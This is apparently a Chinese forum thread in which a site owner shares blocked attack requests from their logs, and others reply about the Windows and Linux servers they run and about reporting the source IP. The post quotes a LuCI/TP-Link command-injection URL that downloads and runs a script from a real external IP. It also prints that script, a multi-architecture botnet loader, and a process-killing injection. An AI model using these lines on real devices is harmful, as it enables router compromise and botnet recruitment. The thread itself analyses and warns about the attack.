喜报，网站被人注入了，似乎植入了个脚本到服务器

[已注销]

看见标题是不是以为注入成功了，诶！
被拦截了！要不然服务器可能真的没
首先今天看日志，诶，发现这样子的奇怪请求：

 /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+wget.sh;+wget+http://87.121.112.42/wget.sh;+chmod+777+wget.sh;+./wget.sh+tplink;+rm+-rf+wget.sh`)

看起来是在尝试用php的xss注入，把 [链接登录后可见] 下载到本地并执行，我看了看这个sh

binarys="mips mpsl x86 arm arm5 arm6 arm7 sh4 ppc arc"
server_ip="87.121.112.42"
binout="runmeplz"
exec="eshay"

for arch in $binarys
do
rm -rf $arch
rm -rf $binout
cd /tmp || cd /var || cd /dev; wget http://$server_ip/$arch -O $binout || curl -O $binout http://$server_ip/$arch || tftp -g -l $binout -r $arch $server_ip
chmod 777 $binout
status=`./$binout $1`
if [ "$status" = "$exec" ]; then
	break
fi
done

看了看，似乎是远控的，然后又发现一段

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`for+proc_dir+in+/proc/[0-9]*;+do+pid=${proc_dir##*/};+buffer=$(cat+"/proc/$pid/maps");+if+[+"${#buffer}"+-gt+1+];+then+if+[+"${buffer#*"/lib/"}"+=+"$buffer"+]+&&+[+"${buffer#*"telnetdbot"}"+=+"$buffer"+];+then+kill+-9+"$pid";+fi;+fi;+done`)

不是哥们，我服务器Windows，成功注入了也没事

0x24a

luci应该是注入路由器之类的

削除禁止

高防也没用，有漏洞还是直接没有

削除禁止

Windows服务器用过，我一个月的文章（7、8篇）不小心给删了，自此，我改用Linux系列。
懒得备份导致的后果。

[已注销]

#4 削除禁止

#5 丰仔

坏了，好像让他注入上了，服务器炸了

丰仔

虽然但是，感觉Windows会比Linux漏洞更多

削除禁止

#5 丰仔 7/19日是世界蓝屏日

削除禁止

#5 丰仔 Linux有些开源，有社区啊

削除禁止

[链接登录后可见] 不用多说，直接d爆（bushi

丰仔

#7 削除禁止正确的，一针见血的

丰仔

#10 [已注销] IP提供商是这家 [链接登录后可见] ，收集收集证据找他们举报吧
滥用举报邮箱：[链接登录后可见]

削除禁止

#10 [已注销] sh好像能在windows运行的

削除禁止

#10 [已注销] 别轻敌啊

丰仔

#12 削除禁止目前这段木马一些语句Windows不支持，他搞不定的

[已注销]

#13 削除禁止好，服务器又好了，只不过是内存爆了

James

这是扫描器扫的，扫的openwrt

削除禁止

#16 丰仔我这shell懂得不多

Googol

server ip get

0x24a

#18 Googol 这是别人攻击者的ip，你想搞攻击想的神志不清了吧

削除禁止

#18 Googol 那是攻击方IP xiao tsa kuei

削除禁止

#18 Googol men te 咯

削除禁止

#18 Googol he wei

[已注销]

#19 0x24a Googol要是想攻击，直接被nodejs内置防火墙拦截hhhhhh

Googol

#20 削除禁止 server_ip=“87.121.112.42”